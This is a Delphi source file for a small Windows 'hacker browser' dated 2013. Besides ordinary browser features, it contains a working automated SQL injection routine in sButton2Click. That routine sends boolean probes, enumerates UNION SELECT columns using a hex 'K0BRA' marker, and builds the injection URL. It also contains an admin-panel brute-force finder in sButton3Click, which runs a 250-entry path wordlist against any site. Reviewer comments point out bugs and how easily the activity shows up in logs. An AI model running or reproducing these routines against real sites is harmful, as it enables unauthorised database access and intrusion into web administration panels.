// DH Browser 0.2
// (C) Doddy Hackman 2013
// Credits :
// Navigate based on : http://www.swissdelphicenter.ch/torry/showcode.php?id=2242
// FindText based on : http://delphi.cjcsoft.net/viewthread.php?tid=47143
// Get HTML based on : http://delphi.about.com/od/adptips2005/qt/webbrowserhtml.htm
unit programa;
interface
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, sSkinManager, StdCtrls, sButton, sEdit, OleCtrls, SHDocVw, sMemo,
sListBox, sGroupBox, sLabel, sCheckBox, ComCtrls, sStatusBar, acPNG,
ExtCtrls, mshtml, Menus, PerlRegEx, IdBaseComponent, IdComponent,
IdTCPConnection, IdTCPClient, IdHTTP, acProgressBar;
type
TForm2 = class(TForm)
  // Main (and only) form: an embedded TWebBrowser plus a few request tools.
  // Component names are the DFM names; what each one is used for is taken
  // from the handlers in the implementation section.
  sSkinManager1: TsSkinManager;   // AlphaControls skin, configured in FormCreate
  sGroupBox1: TsGroupBox;
  sEdit1: TsEdit;                 // target URL; read by every request handler and rewritten by sButton2Click / sButton3Click
  sButton1: TsButton;             // "navigate" -> sButton1Click
  sGroupBox2: TsGroupBox;
  sMemo1: TsMemo;                 // extra request headers sent by Navigate when sCheckBox1 is checked
  sCheckBox1: TsCheckBox;         // whether sMemo1 is passed as headers
  sGroupBox3: TsGroupBox;
  sStatusBar1: TsStatusBar;       // Panels[0] carries the '[+] ...' progress messages
  WebBrowser1: TWebBrowser;       // rendered page; source is copied to sMemo2 on DownloadComplete
  sGroupBox4: TsGroupBox;
  sButton2: TsButton;             // -> sButton2Click
  sButton3: TsButton;             // -> sButton3Click
  sGroupBox5: TsGroupBox;
  sButton4: TsButton;             // opens FindDialog1 -> sButton4Click
  sLabel1: TsLabel;
  Image1: TImage;
  sMemo2: TsMemo;                 // page HTML source; searched by FindDialog1Find
  PopupMenu1: TPopupMenu;
  S1: TMenuItem;                  // show source (sMemo2), hide browser
  S2: TMenuItem;                  // show browser, hide source
  IdHTTP1: TIdHTTP;               // Indy client used by sButton2Click
  PerlRegEx1: TPerlRegEx;         // used by sButton2Click to extract marked values
  FindDialog1: TFindDialog;
  sProgressBar1: TsProgressBar;   // driven by WebBrowser1ProgressChange
  procedure sButton1Click(Sender: TObject);
  procedure S1Click(Sender: TObject);
  procedure S2Click(Sender: TObject);
  procedure sButton3Click(Sender: TObject);
  procedure sButton2Click(Sender: TObject);
  procedure sButton4Click(Sender: TObject);
  procedure FindDialog1Find(Sender: TObject);
  procedure FormClose(Sender: TObject; var Action: TCloseAction);
  procedure WebBrowser1ProgressChange(ASender: TObject;
    Progress, ProgressMax: Integer);
  procedure WebBrowser1DownloadComplete(Sender: TObject);
  procedure FormCreate(Sender: TObject);
private
  { Private declarations }
public
  { Public declarations }
end;
var
  Form2: TForm2; // global form instance; some handlers reach it as Form2.sStatusBar1 instead of Self
implementation
{$R *.dfm}
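procedure TForm2.FindDialog1Find(Sender: TObject);
// FindText based on : http://delphi.cjcsoft.net/viewthread.php?tid=47143
// OnFind handler of FindDialog1: searches sMemo2 for FindText, starting just
// after the current selection, and selects the first match (case-sensitive).
// Sender: the TFindDialog that raised the event (its FindText is used).
// Fixes: the original allocated two PChar buffers with GetMem and never freed
// them, and sized the text buffer with a Word, which truncates for memos
// longer than 65535 characters. Plain string operations avoid both.
var
  texto: string;
  desde: Integer;
  donde: Integer;
begin
  with Sender as TFindDialog do
  begin
    texto := sMemo2.Text;
    // resume after the current selection so repeated "Find Next" advances
    desde := sMemo2.SelStart + sMemo2.SelLength;
    // Pos is 1-based and returns 0 when not found (also for an empty FindText)
    donde := Pos(FindText, Copy(texto, desde + 1, MaxInt));
    if donde > 0 then
    begin
      sMemo2.SelStart := desde + donde - 1;
      sMemo2.SelLength := Length(FindText);
    end;
    sMemo2.SetFocus;
  end;
end;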
procedure TForm2.FormClose(Sender: TObject; var Action: TCloseAction);
// Closing this form shuts down the whole application; Action is left untouched.
begin
  Application.Terminate;
end;
procedure TForm2.FormCreate(Sender: TObject);
// Points the skin manager at the 'Data' folder next to the executable,
// picks the 'tv-b' skin and switches skinning on.
var
  carpetaSkins: string;
begin
  carpetaSkins := ExtractFilePath(Application.ExeName) + 'Data';
  with sSkinManager1 do
  begin
    SkinDirectory := carpetaSkins;
    SkinName := 'tv-b';
    Active := True;
  end;
end;
procedure TForm2.S1Click(Sender: TObject);
// Popup menu item: show the HTML source memo instead of the browser.
begin
  sMemo2.Visible := True;
  WebBrowser1.Visible := False;
end;
procedure TForm2.S2Click(Sender: TObject);
// Popup menu item: show the browser instead of the HTML source memo.
begin
  sMemo2.Visible := False;
  WebBrowser1.Visible := True;
end;
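procedure TForm2.sButton1Click(Sender: TObject);
// Navigate based on : http://www.swissdelphicenter.ch/torry/showcode.php?id=2242
// Loads the URL in sEdit1 into WebBrowser1, bypassing the cache. When
// sCheckBox1 is checked the text of sMemo1 is passed verbatim as additional
// request headers (Navigate expects CRLF-separated header lines, which is the
// line format TMemo.Text produces).
// The two branches of the original differed only in the headers value, so the
// Navigate call is made once.
var
  cabeceras: OleVariant;
  banderas: OleVariant;
  destino: OleVariant;
  datos: OleVariant;
begin
  banderas := navNoReadFromCache or navNoWriteToCache;
  destino := '';
  datos := '';
  if sCheckBox1.Checked then
    cabeceras := sMemo1.Text
  else
    cabeceras := '';
  WebBrowser1.Navigate(sEdit1.Text, banderas, destino, datos, cabeceras);
end;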
procedure TForm2.sButton2Click(Sender: TObject);
// Sends two requests to the URL in sEdit1 that differ only in an appended
// boolean condition, compares the response bodies, and if they differ probes
// the column count with a UNION SELECT of marked constants; on a match sEdit1
// is replaced with the generated URL.
// NOTE(review): every probe carries the fixed marker 0x4b30425241 ('K0BRA') and
// the regex below looks for it, so the tool is trivially fingerprintable in
// server logs and by a WAF rule.
// NOTE(review): IdHTTP1.Get raises EIdHTTPProtocolException on any non-2xx
// response and nothing here catches it, so a single error page ends the
// handler with an unhandled exception dialog.
// NOTE(review): Abort (EAbort) is used to leave the loop, so the final
// '[+] Done' status is skipped when a result is found.
var
  pass1: string;    // '+' : space as it appears in a query string
  pass2: string;    // '--' : SQL line comment appended to every probe
  code: string;     // body of the "1=1" request, later of each column probe
  urltest: string;  // query fragment being built
  urlgen: string;   // '1,2,...' column list; the matched index is replaced by 'hackman'
  full: string;     // final URL written back to sEdit1
  codedos: string;  // body of the "1=0" request
  i: Integer;
begin
  sStatusBar1.Panels[0].Text := '[+] SQLI Scanning ...';
  Form2.sStatusBar1.Update;
  pass1 := '+';
  pass2 := '--';
  // dead store: overwritten below before it is ever used
  urltest := 'concat(0x4b30425241,1,0x4b30425241)';
  sStatusBar1.Panels[0].Text := '[+] Checking ...';
  Form2.sStatusBar1.Update;
  code := IdHTTP1.Get
    (sEdit1.Text + '1' + pass1 + 'and' + pass1 + '1=1' + pass2);
  codedos := IdHTTP1.Get
    (sEdit1.Text + '1' + pass1 + 'and' + pass1 + '1=0' + pass2);
  // any difference between the two bodies (including dynamic content such as
  // timestamps or ads) is treated as a positive result
  if not(code = codedos) then
  begin
    sStatusBar1.Panels[0].Text := '[+] Finding columns number';
    Form2.sStatusBar1.Update;
    urltest := '1' + pass1 + 'and' + pass1 + '1=0' + pass1 + 'union' + pass1 +
      'select' + pass1 + 'concat(0x4b30425241,1,0x4b30425241)';
    urlgen := '1';
    // tries 2..36 columns, one request each
    for i := 2 to 36 do
    begin
      sStatusBar1.Panels[0].Text := '[+] Columns Length : ' + IntToStr(i);
      Form2.sStatusBar1.Update;
      urltest := urltest + ',concat(0x4b30425241,' + IntToStr(i)
        + ',0x4b30425241)';
      urlgen := urlgen + ',' + IntToStr(i);
      code := IdHTTP1.Get(sEdit1.Text + urltest + pass2);
      // 0x4b30425241 is the hex encoding of the ASCII text 'K0BRA'
      PerlRegEx1.Regex := 'K0BRA(.*?)K0BRA';
      PerlRegEx1.Subject := code;
      if PerlRegEx1.Match then
      begin
        // StringReplace with [] replaces only the first occurrence, so a
        // single-digit match such as '1' also hits '1' inside '10'..'36'
        urlgen := StringReplace(urlgen, PerlRegEx1.SubExpressions[1],
          'hackman', []);
        full := sEdit1.Text + '1' + pass1 + 'and' + pass1 + '1=0' + pass1 +
          'union' + pass1 + 'select' + pass1 + urlgen;
        sEdit1.Text := full;
        Abort;
      end;
    end;
  end;
  sStatusBar1.Panels[0].Text := '[+] Done';
  Form2.sStatusBar1.Update;
end;
procedure TForm2.sButton3Click(Sender: TObject);
// Requests each path in `paginas` below the URL in sEdit1 and stops at the
// first one that answers 200, appending that path to sEdit1.
// NOTE(review): the TIdHTTP created below is never freed (no try/finally),
// so every click leaks a client instance.
// NOTE(review): Abort raises EAbort to leave the loop, which also skips the
// closing '[+] Done' lines; a Break would do the same without the exception.
// NOTE(review): IdHTTP.Get raises on non-2xx responses, so the
// ResponseCode = 200 test is only reached for successful requests; the except
// block discards every error, including connection failures, and the loop
// simply moves on to the next path.
// NOTE(review): the fixed wordlist and sequential order make this activity
// easy to recognise in access logs (250 requests for well-known admin paths).
const
  // fixed candidate list, 250 entries, checked in this order
  paginas: array [1 .. 250] of string = ('admin/admin.asp', 'admin/login.asp',
    'admin/index.asp', 'admin/admin.aspx', 'admin/login.aspx',
    'admin/index.aspx', 'admin/webmaster.asp', 'admin/webmaster.aspx',
    'asp/admin/index.asp', 'asp/admin/index.aspx', 'asp/admin/admin.asp',
    'asp/admin/admin.aspx', 'asp/admin/webmaster.asp',
    'asp/admin/webmaster.aspx', 'admin/', 'login.asp', 'login.aspx',
    'admin.asp', 'admin.aspx', 'webmaster.aspx', 'webmaster.asp',
    'login/index.asp', 'login/index.aspx', 'login/login.asp',
    'login/login.aspx', 'login/admin.asp', 'login/admin.aspx',
    'administracion/index.asp', 'administracion/index.aspx',
    'administracion/login.asp', 'administracion/login.aspx',
    'administracion/webmaster.asp', 'administracion/webmaster.aspx',
    'administracion/admin.asp', 'administracion/admin.aspx', 'php/admin/',
    'admin/admin.php', 'admin/index.php', 'admin/login.php',
    'admin/system.php', 'admin/ingresar.php', 'admin/administrador.php',
    'admin/default.php', 'administracion/', 'administracion/index.php',
    'administracion/login.php', 'administracion/ingresar.php',
    'administracion/admin.php', 'administration/', 'administration/index.php',
    'administration/login.php', 'administrator/index.php',
    'administrator/login.php', 'administrator/system.php', 'system/',
    'system/login.php', 'admin.php', 'login.php', 'administrador.php',
    'administration.php', 'administrator.php', 'admin1.html', 'admin1.php',
    'admin2.php', 'admin2.html', 'yonetim.php', 'yonetim.html', 'yonetici.php',
    'yonetici.html', 'adm/', 'admin/account.php', 'admin/account.html',
    'admin/index.html', 'admin/login.html', 'admin/home.php',
    'admin/controlpanel.html', 'admin/controlpanel.php', 'admin.html',
    'admin/cp.php', 'admin/cp.html', 'cp.php', 'cp.html', 'administrator/',
    'administrator/index.html', 'administrator/login.html',
    'administrator/account.html', 'administrator/account.php',
    'administrator.html', 'login.html', 'modelsearch/login.php',
    'moderator.php', 'moderator.html', 'moderator/login.php',
    'moderator/login.html', 'moderator/admin.php', 'moderator/admin.html',
    'moderator/', 'account.php', 'account.html', 'controlpanel/',
    'controlpanel.php', 'controlpanel.html', 'admincontrol.php',
    'admincontrol.html', 'adminpanel.php', 'adminpanel.html', 'admin1.asp',
    'admin2.asp', 'yonetim.asp', 'yonetici.asp', 'admin/account.asp',
    'admin/home.asp', 'admin/controlpanel.asp', 'admin/cp.asp', 'cp.asp',
    'administrator/index.asp', 'administrator/login.asp',
    'administrator/account.asp', 'administrator.asp', 'modelsearch/login.asp',
    'moderator.asp', 'moderator/login.asp', 'moderator/admin.asp',
    'account.asp', 'controlpanel.asp', 'admincontrol.asp', 'adminpanel.asp',
    'fileadmin/', 'fileadmin.php', 'fileadmin.asp', 'fileadmin.html',
    'administration.html', 'sysadmin.php', 'sysadmin.html', 'phpmyadmin/',
    'myadmin/', 'sysadmin.asp', 'sysadmin/', 'ur-admin.asp', 'ur-admin.php',
    'ur-admin.html', 'ur-admin/', 'Server.php', 'Server.html', 'Server.asp',
    'Server/', 'wpadmin/', 'administr8.php', 'administr8.html', 'administr8/',
    'administr8.asp', 'webadmin/', 'webadmin.php', 'webadmin.asp',
    'webadmin.html', 'administratie/', 'admins/', 'admins.php', 'admins.asp',
    'admins.html', 'administrivia/', 'Database_Administration/', 'WebAdmin/',
    'useradmin/', 'sysadmins/', 'admin1/', 'systemadministration/',
    'administrators/', 'pgadmin/', 'directadmin/', 'staradmin/',
    'ServerAdministrator/', 'SysAdmin/', 'administer/', 'LiveUser_Admin/',
    'sysadmin/', 'typo3/', 'panel/', 'cpanel/', 'cPanel/', 'cpanel_file/',
    'platz_login/', 'rcLogin/', 'blogindex/', 'formslogin/', 'autologin/',
    'support_login/', 'meta_login/', 'manuallogin/', 'simpleLogin/',
    'loginflat/', 'utility_login/', 'showlogin/', 'memlogin/', 'members/',
    'login-redirect/', 'sublogin/', 'wplogin/', 'login1/', 'dirlogin/',
    'login_db/', 'xlogin/', 'smblogin/', 'customer_login/', 'UserLogin/',
    'loginus/', 'acct_login/', 'admin_area/', 'bigadmin/', 'project-admins/',
    'phppgadmin/', 'pureadmin/', 'sqladmin/', 'radmind/', 'openvpnadmin/',
    'wizmysqladmin/', 'vadmind/', 'ezsqliteadmin/', 'hpwebjetadmin/',
    'newsadmin/', 'adminpro/', 'Lotus_Domino_Admin/', 'bbadmin/',
    'vmailadmin/', 'Indy_admin/', 'ccp14admin/', 'irc-macadmin/',
    'banneradmin/', 'sshadmin/', 'phpldapadmin/', 'macadmin/',
    'administratoraccounts/', 'admin4_account/', 'admin4_colon/', 'radmind1/',
    'SuperAdmin/', 'AdminTools/', 'cmsadmin/', 'SysAdmin2/', 'globes_admin/',
    'cadmins/', 'phpSQLiteAdmin/', 'navSiteAdmin/', 'server_admin_small/',
    'logo_sysadmin/', 'server/', 'database_administration/', 'power_user/',
    'system_administration/', 'ss_vms_admin_sm/');
var
  IdHTTP: TIdHTTP;   // local client, separate from the IdHTTP1 component
  i: Integer;
  control: Integer;  // 1 once a hit has been recorded
begin
  control := 0;
  sStatusBar1.Panels[0].Text := '[+] Finding Panel ....';
  Form2.sStatusBar1.Update;
  IdHTTP := TIdHTTP.Create(nil); // never freed, see note above
  for i := Low(paginas) to High(paginas) do
    if (control = 1) then
    begin
      // hit found on the previous iteration: leave via EAbort
      Abort;
    end
    else
    begin
      try
        sStatusBar1.Panels[0].Text := '[+] Testing : ' + paginas[i];
        Form2.sStatusBar1.Update;
        // Get raises for non-2xx, so the line below only runs on success
        IdHTTP.Get(sEdit1.Text + '/' + paginas[i]);
        if IdHTTP.ResponseCode = 200 then
        begin
          sStatusBar1.Panels[0].Text := '[+] Done';
          Form2.sStatusBar1.Update;
          sEdit1.Text := sEdit1.Text + '/' + paginas[i];
          control := 1;
        end;
      except
        // both handlers intentionally swallow the error and continue
        on E: EIdHttpProtocolException do
          ;
        on E: Exception do
          ;
      end;
    end;
  // only reached when no path answered 200
  sStatusBar1.Panels[0].Text := '[+] Done';
  Form2.sStatusBar1.Update;
end;
procedure TForm2.sButton4Click(Sender: TObject);
// Opens the modeless find dialog; the actual search runs in FindDialog1Find.
begin
  FindDialog1.Execute;
end;
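procedure TForm2.WebBrowser1DownloadComplete(Sender: TObject);
// Get HTML based on : http://delphi.about.com/od/adptips2005/qt/webbrowserhtml.htm
// Resets the progress bar and copies the outer HTML of the loaded document's
// root element into sMemo2 (sMemo2 is cleared first).
// Fixes: the original hard-cast WebBrowser1.Document to IHTMLDocument2 and
// hid every failure behind an empty except block; the document is now
// checked explicitly and any remaining error is shown in the status bar.
var
  documento: IHTMLDocument2;
  raiz: IHTMLElement;
begin
  sProgressBar1.Position := 0;
  sMemo2.Clear;
  // Document can be nil (nothing loaded yet) or not an HTML document at all,
  // in which case there is no source to show
  if (WebBrowser1.Document = nil) or
    not Supports(WebBrowser1.Document, IHTMLDocument2, documento) then
    Exit;
  try
    raiz := documento.body;
    if raiz = nil then
      Exit;
    // walk up from <body> so outerHTML covers the whole page, not just the body
    while raiz.parentElement <> nil do
      raiz := raiz.parentElement;
    sMemo2.Lines.Add(raiz.outerHTML);
  except
    // best effort: keep the form usable but do not hide the failure
    on E: Exception do
      sStatusBar1.Panels[0].Text := '[-] ' + E.Message;
  end;
end;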
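procedure TForm2.WebBrowser1ProgressChange(ASender: TObject;
  Progress, ProgressMax: Integer);
// Mirrors the browser's download progress on sProgressBar1.
// Progress: bytes (or units) done so far; the control reports -1 when the
// operation has finished. ProgressMax: expected total, may be 0.
// Fix: the original assigned the raw values, leaving the bar at -1 / a zero
// maximum; those cases now reset the bar and Position is clamped to Max.
begin
  if (Progress < 0) or (ProgressMax <= 0) then
  begin
    sProgressBar1.Position := 0;
    Exit;
  end;
  sProgressBar1.Max := ProgressMax;
  if Progress > ProgressMax then
    sProgressBar1.Position := ProgressMax
  else
    sProgressBar1.Position := Progress;
end;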
end.
// The End ?